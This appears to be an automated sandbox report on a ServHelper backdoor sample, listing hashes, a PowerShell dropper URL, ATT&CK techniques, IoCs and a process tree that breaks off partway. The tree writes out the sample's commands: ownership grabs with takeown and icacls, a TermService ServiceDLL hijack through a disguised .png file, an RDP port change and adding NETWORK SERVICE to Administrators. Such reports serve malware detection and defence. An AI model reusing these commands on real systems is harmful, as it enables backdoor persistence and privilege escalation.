servhelper | e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe
Size

6.8MB
MD5

fc239dd2dc52a4853c7be50c86367f7b
SHA1

f6c01c5da3f62a97f6d4427b626d366ad898d3b3
SHA256

e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b
SHA512

4acd84c438e018bdf223561c54b19a6e05b792a5a5bc73d40e5ae4500f3cb9f3ac8e53484b539d49375e4d14341ea1bc45f00223933a4b5f7b251110be3a0458
SSDEEP

196608:DkDzNZ1Ja0TTLmxoQT7RRq4ujlV9450cS:DkDRTPTTStLq4ujw

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
24	3564	powershell.exe
26	3564	powershell.exe
28	3564	powershell.exe
30	3564	powershell.exe
35	3564	powershell.exe
37	3564	powershell.exe
39	3564	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3680 takeown.exe
2124 icacls.exe
3844 icacls.exe
4556 icacls.exe
1960 icacls.exe
2488 icacls.exe
4712 icacls.exe
348 icacls.exe

pid	process
3680	takeown.exe
2124	icacls.exe
3844	icacls.exe
4556	icacls.exe
1960	icacls.exe
2488	icacls.exe
4712	icacls.exe
348	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

4628
4628
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

348 icacls.exe
3680 takeown.exe
2124 icacls.exe
3844 icacls.exe
4556 icacls.exe
1960 icacls.exe
2488 icacls.exe
4712 icacls.exe

pid	process
4628
4628

pid	process
348	icacls.exe
3680	takeown.exe
2124	icacls.exe
3844	icacls.exe
4556	icacls.exe
1960	icacls.exe
2488	icacls.exe
4712	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/4948-0-0x0000000001000000-0x0000000001E46000-memory.dmp	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

23 raw.githubusercontent.com
24 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xklt3ibc.us4.psm1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F45.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F56.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F67.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F57.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6F25.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ubifluzm.5z2.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

3052 WMIC.exe

pid	process
3052	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3904 reg.exe
Runs net.exe

pid	process
3904	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4980	powershell.exe
4980	powershell.exe
4376	powershell.exe
4376	powershell.exe
3108	powershell.exe
3108	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

664
664

pid	process
664
664

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeRestorePrivilege	3844	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3052	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeAuditPrivilege	3052	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3052	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeAuditPrivilege	3052	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3804	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3804	WMIC.exe
Token: SeAuditPrivilege	3804	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3804	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3804	WMIC.exe
Token: SeAuditPrivilege	3804	WMIC.exe
Token: SeDebugPrivilege	3564	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4948 wrote to memory of 4980	4948	e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe	powershell.exe
PID 4948 wrote to memory of 4980	4948	e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe	powershell.exe
PID 4980 wrote to memory of 4508	4980	powershell.exe	csc.exe
PID 4980 wrote to memory of 4508	4980	powershell.exe	csc.exe
PID 4508 wrote to memory of 1072	4508	csc.exe	cvtres.exe
PID 4508 wrote to memory of 1072	4508	csc.exe	cvtres.exe
PID 4980 wrote to memory of 4376	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 4376	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 3108	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 3108	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 3608	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 3608	4980	powershell.exe	powershell.exe
PID 4980 wrote to memory of 3680	4980	powershell.exe	takeown.exe
PID 4980 wrote to memory of 3680	4980	powershell.exe	takeown.exe
PID 4980 wrote to memory of 2124	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 2124	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 3844	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 3844	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 4556	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 4556	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 1960	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 1960	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 2488	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 2488	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 4712	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 4712	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 348	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 348	4980	powershell.exe	icacls.exe
PID 4980 wrote to memory of 4336	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 4336	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 3904	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 3904	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 4244	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 4244	4980	powershell.exe	reg.exe
PID 4980 wrote to memory of 4124	4980	powershell.exe	net.exe
PID 4980 wrote to memory of 4124	4980	powershell.exe	net.exe
PID 4124 wrote to memory of 3620	4124	net.exe	net1.exe
PID 4124 wrote to memory of 3620	4124	net.exe	net1.exe
PID 4980 wrote to memory of 4652	4980	powershell.exe	cmd.exe
PID 4980 wrote to memory of 4652	4980	powershell.exe	cmd.exe
PID 4652 wrote to memory of 1764	4652	cmd.exe	cmd.exe
PID 4652 wrote to memory of 1764	4652	cmd.exe	cmd.exe
PID 1764 wrote to memory of 2316	1764	cmd.exe	net.exe
PID 1764 wrote to memory of 2316	1764	cmd.exe	net.exe
PID 2316 wrote to memory of 1640	2316	net.exe	net1.exe
PID 2316 wrote to memory of 1640	2316	net.exe	net1.exe
PID 4980 wrote to memory of 4060	4980	powershell.exe	cmd.exe
PID 4980 wrote to memory of 4060	4980	powershell.exe	cmd.exe
PID 4060 wrote to memory of 4992	4060	cmd.exe	cmd.exe
PID 4060 wrote to memory of 4992	4060	cmd.exe	cmd.exe
PID 4992 wrote to memory of 4784	4992	cmd.exe	net.exe
PID 4992 wrote to memory of 4784	4992	cmd.exe	net.exe
PID 4784 wrote to memory of 372	4784	net.exe	net1.exe
PID 4784 wrote to memory of 372	4784	net.exe	net1.exe
PID 2596 wrote to memory of 4460	2596	cmd.exe	net.exe
PID 2596 wrote to memory of 4460	2596	cmd.exe	net.exe
PID 4460 wrote to memory of 4924	4460	net.exe	net1.exe
PID 4460 wrote to memory of 4924	4460	net.exe	net1.exe
PID 2364 wrote to memory of 3836	2364	cmd.exe	net.exe
PID 2364 wrote to memory of 3836	2364	cmd.exe	net.exe
PID 3836 wrote to memory of 396	3836	net.exe	net1.exe
PID 3836 wrote to memory of 396	3836	net.exe	net1.exe
PID 3048 wrote to memory of 2704	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 2704	3048	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe
"C:\Users\Admin\AppData\Local\Temp\e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ig145d0f\ig145d0f.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4805.tmp" "c:\Users\Admin\AppData\Local\Temp\ig145d0f\CSCBCD0C3FD37AB4AE28434A37E3FC55AAE.TMP"
      4⤵
      PID:1072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3680
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2124
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4556
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1960
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2488
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4712
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:348
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4336
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:3904
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:4244
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2316
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1640
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4992
    - - C:\Windows\system32\net.exe
        
